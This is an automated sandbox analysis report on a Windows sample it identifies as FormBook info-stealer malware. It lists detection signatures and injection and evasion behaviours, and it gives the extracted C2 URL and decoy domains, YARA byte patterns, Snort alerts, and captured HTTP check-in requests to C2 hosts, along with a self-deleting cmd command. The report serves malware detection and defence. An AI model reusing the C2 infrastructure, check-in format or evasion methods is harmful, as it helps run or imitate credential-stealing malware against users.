Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.Tedy.130342.18814.29997

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Tedy.130342.18814.29997 (renamed file extension from 29997 to exe)
Analysis ID:640202
MD5:9042135a78a25e60669964f0e673d764
SHA1:0186f581ebb95406ea4f1a631080f2b60fa364fa
SHA256:f85d2878993aa3b49cc697b8b4dd73c75abd3a6e5891d0a6121da7aa272cc666
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • SecuriteInfo.com.Variant.Tedy.130342.18814.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe" MD5: 9042135A78A25E60669964F0E673D764)
    • ByteCodeGenerator.exe (PID: 7140 cmdline: C:\Windows\SysWOW64\ByteCodeGenerator.exe MD5: AFC144CF65A44040369561D0A7B808BC)
      • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 5708 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 3220 cmdline: /c del "C:\Windows\SysWOW64\ByteCodeGenerator.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.coraroseromance.net/aet3/"], "decoy": ["foldemforever.com", "zhouxin94.digital", "hayultrafans.com", "coinmatrfx.com", "countz-re.store", "lotcollection.com", "zuclopenthixolacetate.lundbeck", "brosgangworldwide.com", "relord.life", "smell-ease.com", "87mhxyz.com", "ccav91.com", "tinnituscure-reviews.com", "wanxunm.com", "slim7.net", "rapiturs.com", "orucqurbanov.com", "domainedulacrond.com", "rochelpraxis.com", "bilingualme.com", "0-level.com", "fuugiti.xyz", "a7gaming.com", "munichslave.com", "helpmeez.com", "czhj-led.com", "blingalingdecor.com", "gogo996icu.xyz", "hgamerpillar.com", "decentralized-asset.com", "whatisthemetafor.com", "bbthaiforex.com", "budurr.com", "mkki33.com", "sportsinfolab.com", "cornhole-nederland.com", "lilabymiko.com", "subbay.net", "ediapark.com", "teethblog.net", "internationalpageantsociety.com", "lizhisen.com", "yiqimaidan.com", "loveuco.com", "rightchoicemobiledetailing.com", "nhongever.com", "myhealthtestsite.com", "800055121.com", "filmabg.xyz", "loverightnow.biz", "optician-divine.com", "pcwx2345.com", "rdmmadu.com", "cys-cs.com", "bineghab.com", "xn--2r5b1f27r1nh.com", "weierhui.com", "everegal.xyz", "crispinandarchie.com", "bluetalkers.com", "greenfieldecostayphongnha.com", "loomsolaradmincenter.online", "vdmdyznwuej.xyz", "houseofdecoration.com"]}
SourceRuleDescriptionAuthorStrings
00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8fb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16355:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15e01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16457:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1507c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa742:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b9a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1caaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18829:$sqlite3step: 68 34 1C 7B E1
    • 0x1893c:$sqlite3step: 68 34 1C 7B E1
    • 0x18858:$sqlite3text: 68 38 2A 90 C5
    • 0x1897d:$sqlite3text: 68 38 2A 90 C5
    • 0x1886b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18993:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8c18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8fb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x16355:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15e01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x16457:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x165cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x99ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1507c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa742:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b9a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1caaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 41 entries
      SourceRuleDescriptionAuthorStrings
      3.0.ByteCodeGenerator.exe.400000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.ByteCodeGenerator.exe.400000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8c18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8fb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x16355:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15e01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x16457:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x165cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x99ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1507c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa742:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b9a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1caaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.ByteCodeGenerator.exe.400000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18829:$sqlite3step: 68 34 1C 7B E1
        • 0x1893c:$sqlite3step: 68 34 1C 7B E1
        • 0x18858:$sqlite3text: 68 38 2A 90 C5
        • 0x1897d:$sqlite3text: 68 38 2A 90 C5
        • 0x1886b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18993:$sqlite3blob: 68 53 D8 7F 8C
        3.0.ByteCodeGenerator.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.ByteCodeGenerator.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7e18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x81b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15555:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15001:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15657:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x157cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x8bca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1427c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9942:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bcaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 25 entries
          No Sigma rule has matched
          Timestamp:192.168.2.5104.21.18.17149861802031449 06/06/22-23:33:30.335478
          SID:2031449
          Source Port:49861
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5162.213.255.23749865802031449 06/06/22-23:33:46.702528
          SID:2031449
          Source Port:49865
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5104.21.18.17149861802031453 06/06/22-23:33:30.335478
          SID:2031453
          Source Port:49861
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5104.21.18.17149861802031412 06/06/22-23:33:30.335478
          SID:2031412
          Source Port:49861
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.534.102.136.18049859802031453 06/06/22-23:33:25.150349
          SID:2031453
          Source Port:49859
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.534.102.136.18049859802031412 06/06/22-23:33:25.150349
          SID:2031412
          Source Port:49859
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5162.213.255.23749865802031453 06/06/22-23:33:46.702528
          SID:2031453
          Source Port:49865
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.534.102.136.18049859802031449 06/06/22-23:33:25.150349
          SID:2031449
          Source Port:49859
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5162.213.255.23749865802031412 06/06/22-23:33:46.702528
          SID:2031412
          Source Port:49865
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeVirustotal: Detection: 28%Perma Link
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: 3.2.ByteCodeGenerator.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 3.0.ByteCodeGenerator.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 3.0.ByteCodeGenerator.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 3.0.ByteCodeGenerator.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 3.0.ByteCodeGenerator.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.coraroseromance.net/aet3/"], "decoy": ["foldemforever.com", "zhouxin94.digital", "hayultrafans.com", "coinmatrfx.com", "countz-re.store", "lotcollection.com", "zuclopenthixolacetate.lundbeck", "brosgangworldwide.com", "relord.life", "smell-ease.com", "87mhxyz.com", "ccav91.com", "tinnituscure-reviews.com", "wanxunm.com", "slim7.net", "rapiturs.com", "orucqurbanov.com", "domainedulacrond.com", "rochelpraxis.com", "bilingualme.com", "0-level.com", "fuugiti.xyz", "a7gaming.com", "munichslave.com", "helpmeez.com", "czhj-led.com", "blingalingdecor.com", "gogo996icu.xyz", "hgamerpillar.com", "decentralized-asset.com", "whatisthemetafor.com", "bbthaiforex.com", "budurr.com", "mkki33.com", "sportsinfolab.com", "cornhole-nederland.com", "lilabymiko.com", "subbay.net", "ediapark.com", "teethblog.net", "internationalpageantsociety.com", "lizhisen.com", "yiqimaidan.com", "loveuco.com", "rightchoicemobiledetailing.com", "nhongever.com", "myhealthtestsite.com", "800055121.com", "filmabg.xyz", "loverightnow.biz", "optician-divine.com", "pcwx2345.com", "rdmmadu.com", "cys-cs.com", "bineghab.com", "xn--2r5b1f27r1nh.com", "weierhui.com", "everegal.xyz", "crispinandarchie.com", "bluetalkers.com", "greenfieldecostayphongnha.com", "loomsolaradmincenter.online", "vdmdyznwuej.xyz", "houseofdecoration.com"]}

          Exploits

          barindex
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Tedy.130342.18814.exe.4bce918.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Tedy.130342.18814.exe PID: 7000, type: MEMORYSTR
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: explorer.pdbUGP source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: D:\v2.0\A1\_work\56\obj\Release.AnyCPU\Vssf.InteractiveClient\MS.VS.Services.Client.Interactive\Microsoft.VisualStudio.Services.Client.Interactive.pdb source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmp
          Source: Binary string: wntdll.pdbUGP source: ByteCodeGenerator.exe, 00000003.00000002.569640393.000000000351F000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.471514143.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.473401991.000000000326B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.567423695.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.570117498.00000000053E5000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ByteCodeGenerator.exe, ByteCodeGenerator.exe, 00000003.00000002.569640393.000000000351F000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.471514143.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.473401991.000000000326B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.567423695.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.570117498.00000000053E5000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: ByteCodeGenerator.pdb source: explorer.exe, 0000000C.00000002.713955405.0000000005AB7000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: ByteCodeGenerator.pdbGCTL source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.488193486.0000000004D9C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.713955405.0000000005AB7000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: explorer.pdb source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 4x nop then pop edi3_2_0040C9EF
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 4x nop then pop esi3_2_004174C5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 4x nop then pop ebx3_2_00406ED5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 4x nop then pop ebx3_2_00406EAA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi12_2_0334C9EF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop ebx12_2_03346EAA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop ebx12_2_03346ED5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop esi12_2_033574C5

          Networking

          barindex
          Source: C:\Windows\explorer.exeDomain query: www.coraroseromance.net
          Source: C:\Windows\explorer.exeDomain query: www.foldemforever.com
          Source: C:\Windows\explorer.exeDomain query: www.fuugiti.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.loveuco.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.18.171 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.250 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49859 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49859 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49859 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49861 -> 104.21.18.171:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49861 -> 104.21.18.171:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49861 -> 104.21.18.171:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49865 -> 162.213.255.237:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49865 -> 162.213.255.237:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49865 -> 162.213.255.237:80
          Source: C:\Windows\explorer.exeDNS query: www.fuugiti.xyz
          Source: Malware configuration extractorURLs: www.coraroseromance.net/aet3/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /aet3/?l48p=kapzR8JPYtO2Wg0hfvI2cMfxoG1KoiKvyBJf4rs85HfCQVdH/hem3I02OclTyA2jLT1l&vHn=5j90bfXx9vsx HTTP/1.1Host: www.foldemforever.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx HTTP/1.1Host: www.fuugiti.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aet3/?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsx HTTP/1.1Host: www.coraroseromance.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aet3/?l48p=Cb4ia8HH1RnDyQ8jvjqe0JDM7pVrsOY5rXp7lN7wIP/kU7YbHz52vieK+EDcuAZr7Fd5&vHn=5j90bfXx9vsx HTTP/1.1Host: www.loveuco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 203.170.80.250 203.170.80.250
          Source: Joe Sandbox ViewIP Address: 203.170.80.250 203.170.80.250
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 06 Jun 2022 21:33:25 GMTContent-Type: text/htmlContent-Length: 291ETag: "629e372d-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https:///AzureRMAudienceEndpoint;https://management.azure.com/5https://graph.windows.net/Ihttps://ma
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeString found in binary or memory: https://graph.windows.net/
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeString found in binary or memory: https://login.live.com/
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeString found in binary or memory: https://login.live.com/uilogout.srf
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://login.live.com/uilogout.srf/https://login.live.com/
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://login.microsoftonline.com/
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://login.microsoftonline.com/)AadApplicationTenantIf8cdef31-a31e-4b4a-93e4-5f571e91255a
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeString found in binary or memory: https://management.azure.com/
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeString found in binary or memory: https://management.core.windows.net/
          Source: explorer.exe, 0000000C.00000002.714030673.0000000005C32000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.coraroseromance.net/aet3?l48p=X6tC1H3r17TreXHELX
          Source: unknownDNS traffic detected: queries for: www.foldemforever.com
          Source: global trafficHTTP traffic detected: GET /aet3/?l48p=kapzR8JPYtO2Wg0hfvI2cMfxoG1KoiKvyBJf4rs85HfCQVdH/hem3I02OclTyA2jLT1l&vHn=5j90bfXx9vsx HTTP/1.1Host: www.foldemforever.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
